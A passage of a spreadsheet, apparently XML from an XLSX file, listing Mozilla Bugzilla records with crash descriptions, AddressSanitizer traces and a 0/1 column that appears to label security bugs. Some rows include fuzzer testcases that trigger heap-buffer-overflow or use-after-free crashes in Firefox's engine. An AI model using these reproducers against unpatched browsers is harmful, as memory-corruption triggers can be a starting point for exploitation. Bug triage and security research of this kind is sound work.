    #32 0x7fc5c540a40f in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsGlobalWindow.cpp:12260
    #33 0x7fc5c53e8544 in nsGlobalWindow::RunTimeout(nsTimeout*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsGlobalWindow.cpp:12503:32
    #34 0x7fc5c5380fd1 in nsGlobalWindow::TimerCallback(nsITimer*, void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsGlobalWindow.cpp:12749:3
    #35 0x7fc5c29ff777 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsTimerImpl.cpp:524:7
    #36 0x7fc5c29d6abb in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/TimerThread.cpp:286:3
previously allocated by thread T0 (Web Content) here:
    #0 0x4b525b in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e2f2d in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fc5c7bb4743 in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:193:12
    #3 0x7fc5c7bb4743 in NS_NewHTMLLegendElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/html/HTMLLegendElement.cpp:13
    #4 0x7fc5c7cf4b78 in CreateHTMLElement /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/html/nsHTMLContentSink.cpp:292:41
    #5 0x7fc5c7cf4b78 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/html/nsHTMLContentSink.cpp:273
    #6 0x7fc5c57ff36c in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsNameSpaceManager.cpp:147:12
    #7 0x7fc5c49a7c26 in nsHtml5TreeOperation::CreateElement(int, nsIAtom*, nsHtml5HtmlAttributes*, mozilla::dom::FromParser, nsNodeInfoManager*, nsHtml5DocumentBuilder*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOperation.cpp:351:3
    #8 0x7fc5c498b728 in nsHtml5TreeBuilder::createElement(int, nsIAtom*, nsHtml5HtmlAttributes*, void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeBuilderCppSupplement.h:95:7
    #9 0x7fc5c49925a3 in nsHtml5TreeBuilder::appendToCurrentNodeAndPushElementMayFoster(nsHtml5ElementName*, nsHtml5HtmlAttributes*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeBuilder.cpp:4023:11
    #10 0x7fc5c4956bb1 in nsHtml5TreeBuilder::startTag(nsHtml5ElementName*, nsHtml5HtmlAttributes*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeBuilder.cpp:1357:15
    #11 0x7fc5c4947478 in nsHtml5Tokenizer::emitCurrentTagToken(bool, int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5Tokenizer.cpp:306:7
    #12 0x7fc5c497dcc2 in int nsHtml5Tokenizer::stateLoop&lt;nsHtml5SilentPolicy&gt;(int, char16_t, int, char16_t*, bool, int, int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5Tokenizer.cpp:830:50
    #13 0x7fc5c493c3a5 in nsHtml5Tokenizer::tokenizeBuffer(nsHtml5UTF16Buffer*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5Tokenizer.cpp:405:11
    #14 0x7fc5c4943d15 in nsHtml5StringParser::Tokenize(nsAString_internal const&amp;, nsIDocument*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5StringParser.cpp:116:21
    #15 0x7fc5c5307196 in nsContentUtils::ParseFragmentHTML(nsAString_internal const&amp;, nsIContent*, nsIAtom*, int, bool, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsContentUtils.cpp:4518:5
    #16 0x7fc5c5305aec in nsContentUtils::CreateContextualFragment(nsINode*, nsAString_internal const&amp;, bool, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsContentUtils.cpp:4408:13
    #17 0x7fc5c583a249 in nsRange::CreateContextualFragment(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsRange.cpp:2845:10
    #18 0x7fc5c641687d in mozilla::dom::RangeBinding::createContextualFragment(JSContext*, JS::Handle&lt;JSObject*&gt;, nsRange*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/RangeBinding.cpp:1124:62
    #19 0x7fc5c752dab7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2771:13
    #20 0x7fc5cd429f1b in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:232:15
    #21 0x7fc5cd429f1b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:441
    #22 0x7fc5cd410c33 in CallFromStack /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:504:12
    #23 0x7fc5cd410c33 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #24 0x7fc5cd3f740e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #25 0x7fc5cd42a5c0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:471:15
    #26 0x7fc5cd3da741 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:517:10
    #27 0x7fc5ccf5d8b8 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:2852:12
    #28 0x7fc5c717588d in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #29 0x7fc5c540a40f in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
    #30 0x7fc5c540a40f in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsGlobalWindow.cpp:12260
    #31 0x7fc5c53e8544 in nsGlobalWindow::RunTimeout(nsTimeout*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsGlobalWindow.cpp:12503:32
    #32 0x7fc5c5380fd1 in nsGlobalWindow::TimerCallback(nsITimer*, void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsGlobalWindow.cpp:12749:3
    #33 0x7fc5c29ff777 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsTimerImpl.cpp:524:7
    #34 0x7fc5c29d6abb in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/TimerThread.cpp:286:3
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsINode.h:915:12 in GetParentNode
Shadow bytes around the buggy address:
  0x0c1a7ffff7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a7ffff7f0: 00 fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c1a7ffff800: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c1a7ffff810: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a7ffff820: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fd fd
=&gt;0x0c1a7ffff830: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1a7ffff840: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a7ffff850: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c1a7ffff860: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a7ffff870: fd fd fd fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1a7ffff880: 00 00 00 00 00 00 00 00 00 00 00 00 00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3093==ABORTING</t>
        </is>
      </c>
      <c r="X856" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="857">
      <c r="A857" t="n">
        <v>1155474</v>
      </c>
      <c r="B857" t="inlineStr">
        <is>
          <t>2015-04-16 18:21:17 -0700</t>
        </is>
      </c>
      <c r="C857" t="inlineStr">
        <is>
          <t>Crash [@ js::Shape::search] with heap-buffer-overflow</t>
        </is>
      </c>
      <c r="D857" t="inlineStr">
        <is>
          <t>2016-12-01 13:38:20 -0800</t>
        </is>
      </c>
      <c r="E857" t="n">
        <v>1</v>
      </c>
      <c r="F857" t="n">
        <v>1</v>
      </c>
      <c r="G857" t="n">
        <v>3</v>
      </c>
      <c r="H857" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I857" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J857" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K857" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L857" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M857" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N857" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O857" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P857" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main38+]</t>
        </is>
      </c>
      <c r="Q857" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R857" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S857" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T857" t="n">
        <v>1</v>
      </c>
      <c r="U857" t="n">
        <v>0</v>
      </c>
      <c r="V857" t="n">
        <v>23</v>
      </c>
      <c r="W857" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision de27ac2ab94f (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug, run with --fuzzing-safe --ion-eager --ion-offthread-compile=off):
{
  for (var i = 0; i &lt; 100; i++)
    arr += arr.foo;
  let arr = 1;
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x00000000005e5cb7 in js::Shape::search (cx=cx@entry=0x7ffff698d0f0, start=0x7ffff69223f8, id=..., pentry=pentry@entry=0x7fffffffcca0, adding=adding@entry=false) at js/src/vm/Shape-inl.h:44
#0  0x00000000005e5cb7 in js::Shape::search (cx=cx@entry=0x7ffff698d0f0, start=0x7ffff69223f8, id=..., pentry=pentry@entry=0x7fffffffcca0, adding=adding@entry=false) at js/src/vm/Shape-inl.h:44
#1  0x00000000005c32b8 in lookup (id=..., cx=0x7ffff698d0f0, this=&lt;optimized out&gt;) at js/src/vm/NativeObject.cpp:224
#2  LookupOwnPropertyInline&lt;(js::AllowGC)1&gt; (donep=&lt;synthetic pointer&gt;, propp=..., id=..., obj=..., cx=0x7ffff698d0f0) at js/src/vm/NativeObject-inl.h:460
#3  NativeGetPropertyInline&lt;(js::AllowGC)1&gt; (vp=..., nameLookup=NotNameLookup, id=..., receiver=..., obj=..., cx=0x7ffff698d0f0) at js/src/vm/NativeObject.cpp:1831
#4  js::NativeGetProperty (cx=0x7ffff698d0f0, obj=..., receiver=..., id=..., vp=...) at js/src/vm/NativeObject.cpp:1875
#5  0x00000000008a6855 in GetProperty (vp=..., id=..., receiver=..., obj=..., cx=0x7ffff698d0f0, cx@entry=0x7fffffffcec0) at js/src/vm/NativeObject.h:1417
#6  MaybeCallMethod (cx=cx@entry=0x7ffff698d0f0, obj=obj@entry=..., id=..., id@entry=..., vp=vp@entry=...) at js/src/jsobj.cpp:3315
#7  0x00000000008ac7a4 in JS::OrdinaryToPrimitive (cx=0x7ffff698d0f0, obj=..., hint=JSTYPE_VOID, vp=...) at js/src/jsobj.cpp:3377
#8  0x000000000055d027 in ToPrimitive (vp=..., cx=0x7ffff698d0f0) at js/src/jsobjinlines.h:545
#9  AddOperation (res=..., rhs=..., lhs=..., cx=0x7ffff698d0f0) at js/src/vm/Interpreter.cpp:1537
#10 js::AddValues (cx=cx@entry=0x7ffff698d0f0, lhs=..., lhs@entry=..., rhs=..., rhs@entry=..., res=..., res@entry=...) at js/src/vm/Interpreter.cpp:4421
#11 0x00000000006b7954 in js::jit::DoBinaryArithFallback (cx=0x7ffff698d0f0, frame=0x7fffffffd118, stub_=0x7ffff69a0720, lhs=..., rhs=..., ret=...) at js/src/jit/BaselineIC.cpp:2549
#12 0x00007ffff7feebc4 in ?? ()
#13 0x00007ffff7fe8640 in ?? ()
#14 0x00007fffffffd0b8 in ?? ()
#15 0x00007ffff7fe8640 in ?? ()
#16 0xfff9000000000000 in ?? ()
#17 0x000000000171aba0 in js::jit::DoConcatStringsInfo ()
#18 0x00007ffff4d51d60 in ?? ()
[...]
#28 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7ffff69223f8	140737330160632
rcx	0x7fffffffcca0	140737488342176
rdx	0x0	0
rsi	0x7ffff4d1cc10	140737300778000
rdi	0x7ffff698d0f0	140737330598128
rbp	0x7ffff4d1cc10	140737300778000
rsp	0x7fffffffcbe0	140737488341984
r8	0x0	0
r9	0x7ffff4d5e128	140737301045544
r10	0x7fffffffd0e0	140737488343264
r11	0xfff9000000000000	-1970324836974592
r12	0x7ffff698d108	140737330598152
r13	0x7fffffffcc60	140737488342112
r14	0x7fffffffcd90	140737488342416
r15	0x7ffff698d0f0	140737330598128
rip	0x5e5cb7 &lt;js::Shape::search(js::ExclusiveContext*, js::Shape*, jsid, js::ShapeTable::Entry**, bool)+167&gt;
=&gt; 0x5e5cb7 &lt;js::Shape::search(js::ExclusiveContext*, js::Shape*, jsid, js::ShapeTable::Entry**, bool)+167&gt;:	mov    0x20(%rax),%rdi
   0x5e5cbb &lt;js::Shape::search(js::ExclusiveContext*, js::Shape*, jsid, js::ShapeTable::Entry**, bool)+171&gt;:	callq  0x5bfed0 &lt;js::ShapeTable::search(jsid, bool)&gt;
ASan trace:
=================================================================
==12534==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60800003a68d at pc 0xa94398 bp 0x7fff97efdb70 sp 0x7fff97efdb68
READ of size 1 at 0x60800003a68d thread T0
    #0 0xa94397 in js::Shape::inDictionary() const js/src/vm/Shape.h:786
    #1 0xa94397 in js::Shape::search(js::ExclusiveContext*, js::Shape*, jsid, js::ShapeTable::Entry**, bool) js/src/vm/Shape-inl.h:43
    #2 0x9fe521 in js::NativeObject::lookup(js::ExclusiveContext*, jsid) js/src/vm/NativeObject.cpp:224:12
    #3 0x9fe521 in bool js::LookupOwnPropertyInline&lt;(js::AllowGC)1&gt;(js::ExclusiveContext*, js::MaybeRooted&lt;js::NativeObject*, (js::AllowGC)1&gt;::HandleType, js::MaybeRooted&lt;jsid, (js::AllowGC)1&gt;::HandleType,
 js::MaybeRooted&lt;js::Shape*, (js::AllowGC)1&gt;::MutableHandleType, bool*) js/src/vm/NativeObject-inl.h:460
    #4 0x9fe521 in _ZL23NativeGetPropertyInlineILN2js7AllowGCE1EEbP9JSContextNS0_11MaybeRootedIPNS0_12NativeObjectEXT_EE10HandleTypeENS4_IP8JSObjectXT_EE10HandleTypeENS4_I4jsidXT_EE10HandleTypeE12IsNameLoo
kupNS4_IN2JS5ValueEXT_EE17MutableHandleTypeE js/src/vm/NativeObject.cpp:1831
    #5 0x9fe521 in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) 
js/src/vm/NativeObject.cpp:1875
    #6 0x151a2f0 in js::GetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Nat
iveObject.h:1417
    #7 0x151a2f0 in MaybeCallMethod(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsobj.cpp:3315
    #8 0x1518424 in JS::OrdinaryToPrimitive(JSContext*, JS::Handle&lt;JSObject*&gt;, JSType, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsobj.cpp:3377
    #9 0x15179a1 in js::ToPrimitive(JSContext*, JS::Handle&lt;JSObject*&gt;, JSType, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsobj.cpp:3196
    #10 0x946317 in js::ToPrimitive(JSContext*, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsobjinlines.h:545
    #11 0x946317 in AddOperation(JSContext*, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:1537
    #12 0x946317 in js::AddValues(JSContext*, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:4421
    #13 0xd607a1 in js::jit::DoBinaryArithFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICBinaryArith_Fallback*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/BaselineIC.cpp:2549
0x60800003a68d is located 19 bytes to the left of 96-byte region [0x60800003a6a0,0x60800003a700)
allocated by thread T0 here:
    #0 0x4abd47 in __interceptor_malloc /srv/repos/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x7acce4 in js_malloc(unsigned long) js/src/opt64asan/js/src/../../dist/include/js/Utility.h:119
    #2 0x7acce4 in _ZL13js_pod_mallocIhEPT_m js/src/opt64asan/js/src/../../dist/include/js/Utility.h:274
    #3 0x7acce4 in unsigned char* js::MallocProvider&lt;js::ExclusiveContext&gt;::pod_malloc&lt;unsigned char&gt;(unsigned long) js/src/vm/MallocProvider.h:62
    #4 0x7acce4 in js::ScriptSource* js::MallocProvider&lt;js::ExclusiveContext&gt;::new_&lt;js::ScriptSource&gt;() js/src/vm/MallocProvider.h:161
    #5 0x7acce4 in js::frontend::CreateScriptSourceObject(js::ExclusiveContext*, JS::ReadOnlyCompileOptions const&amp;) js/src/frontend/BytecodeCompiler.cpp:181
    #6 0x7ad99e in js::frontend::CompileScript(js::ExclusiveContext*, js::LifoAlloc*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;js::StaticEvalObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JSString*, unsigned int, js::SourceCompressionTask*) js/src/frontend/BytecodeCompiler.cpp:246
    #7 0x1402e3b in JS::Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:3792
    #8 0x14033f2 in JS::Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:3802
    #9 0x14033f2 in JS::Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, char const*, unsigned long, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:3817 
    #10 0x140364c in JS::Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, _IO_FILE*, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:3828
SUMMARY: AddressSanitizer: heap-buffer-overflow js/src/vm/Shape.h:786 js::Shape::inDictionary() const
Marking s-s and sec-critical because ASan shows this crash as a heap-buffer-overflow:</t>
        </is>
      </c>
      <c r="X857" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="858">
      <c r="A858" t="n">
        <v>837007</v>
      </c>
      <c r="B858" t="inlineStr">
        <is>
          <t>2013-01-31 18:07:56 -0800</t>
        </is>
      </c>
      <c r="C858" t="inlineStr">
        <is>
          <t>"ASSERTION: Out of flow frame doesn't have the expected parent" and crash with -moz-column, float</t>
        </is>
      </c>
      <c r="D858" t="inlineStr">
        <is>
          <t>2015-04-16 11:04:57 -0700</t>
        </is>
      </c>
      <c r="E858" t="n">
        <v>1</v>
      </c>
      <c r="F858" t="n">
        <v>1</v>
      </c>
      <c r="G858" t="n">
        <v>3</v>
      </c>
      <c r="H858" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I858" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J858" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K858" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L858" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M858" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N858" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O858" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P858" t="inlineStr">
        <is>
          <t>[fuzzblocker][adv-main21+]</t>
        </is>
      </c>
      <c r="Q858" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R858" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S858" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T858" t="n">
        <v>1</v>
      </c>
      <c r="U858" t="n">
        <v>0</v>
      </c>
      <c r="V858" t="n">
        <v>16</v>
      </c>
      <c r="W858" t="inlineStr">
        <is>
          <t>Created attachment 708889
testcase
###!!! ASSERTION: Out of flow frame doesn't have the expected parent: 'outOfFlowFrame-&gt;GetParent() == this', file layout/generic/nsBlockFrame.cpp, line 6898
###!!! ASSERTION: Broken frame linkage: 'prevSibling &amp;&amp; prevSibling-&gt;GetNextSibling() == aFrame', file layout/generic/nsFrameList.cpp, line 95
###!!! ASSERTION: Creating a circular frame list, this is very bad.: 'this != aNextSibling', file layout/generic/nsIFrame.h, line 1133
[@ nsFrameList::RemoveFrame]</t>
        </is>
      </c>
      <c r="X858" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="859">
      <c r="A859" t="n">
        <v>758141</v>
      </c>
      <c r="B859" t="inlineStr">
        <is>
          <t>2012-05-24 01:17:58 -0700</t>
        </is>
      </c>
      <c r="C859" t="inlineStr">
        <is>
          <t>implement the component search facility from the bmo extension in the guided entry form.</t>
        </is>
      </c>
      <c r="D859" t="inlineStr">
        <is>
          <t>2019-10-15 16:24:14 -0700</t>
        </is>
      </c>
      <c r="E859" t="n">
        <v>1</v>
      </c>
      <c r="F859" t="n">
        <v>1</v>
      </c>
      <c r="G859" t="n">
        <v>7</v>
      </c>
      <c r="H859" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I859" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J859" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K859" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L859" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M859" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N859" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O859" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P859" t="inlineStr"/>
      <c r="Q859" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R859" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S859" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T859" t="n">
        <v>1</v>
      </c>
      <c r="U859" t="n">
        <v>0</v>
      </c>
      <c r="V859" t="n">
        <v>4</v>
      </c>
      <c r="W859" t="inlineStr">
        <is>
          <t>implement the component search facility from the bmo extension (bug 747193) in the guided entry form.</t>
        </is>
      </c>
      <c r="X859" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="860">
      <c r="A860" t="n">
        <v>921470</v>
      </c>
      <c r="B860" t="inlineStr">
        <is>
          <t>2013-09-27 06:21:26 -0700</t>
        </is>
      </c>
      <c r="C860" t="inlineStr">
        <is>
          <t>Assertion failure: [barrier verifier] Unmarked edge: baseline-monitor-typeobject, at gc/Verifier.cpp:569</t>
        </is>
      </c>
      <c r="D860" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:20 -0800</t>
        </is>
      </c>
      <c r="E860" t="n">
        <v>1</v>
      </c>
      <c r="F860" t="n">
        <v>1</v>
      </c>
      <c r="G860" t="n">
        <v>3</v>
      </c>
      <c r="H860" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I860" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J860" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K860" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L860" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M860" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N860" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O860" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P860" t="inlineStr">
        <is>
          <t>[jsbugmon:update,testComment=8,origRev=aa986b6ce882][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q860" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R860" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S860" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T860" t="n">
        <v>1</v>
      </c>
      <c r="U860" t="n">
        <v>0</v>
      </c>
      <c r="V860" t="n">
        <v>26</v>
      </c>
      <c r="W860" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision e4cd2242cc7d (threadsafe build, run with --fuzzing-safe --ion-eager --thread-count=2 --ion-parallel-compile=on):
var lfcode = new Array();
lfcode.push("");
lfcode.push("4");
lfcode.push("\
	gczeal(4);\
	function callback() {}\
	callback({});\
	setObjectMetadataCallback(callback);\
");
while (true) {
	var file = lfcode.shift(); if (file == undefined) { break; }
        loadFile(file)
}
function loadFile(lfVarx) {
    try {
        if (lfVarx.substr(-3) != ".js" &amp;&amp; lfVarx.length != 1) {
            switch (lfRunTypeId) {
                case 4: eval("(function() { " + lfVarx + " })();"); break;
            }
        } else if (!isNaN(lfVarx)) {
            lfRunTypeId = parseInt(lfVarx);
        }
    } catch (lfVare) {
        if (lfVare instanceof SyntaxError) {}
    }
}</t>
        </is>
      </c>
      <c r="X860" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="861">
      <c r="A861" t="n">
        <v>141716</v>
      </c>
      <c r="B861" t="inlineStr">
        <is>
          <t>2002-05-02 04:03:52 -0700</t>
        </is>
      </c>
      <c r="C861" t="inlineStr">
        <is>
          <t>Mozilla context menu broken on query.cgi</t>
        </is>
      </c>
      <c r="D861" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E861" t="n">
        <v>1</v>
      </c>
      <c r="F861" t="n">
        <v>1</v>
      </c>
      <c r="G861" t="n">
        <v>4</v>
      </c>
      <c r="H861" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
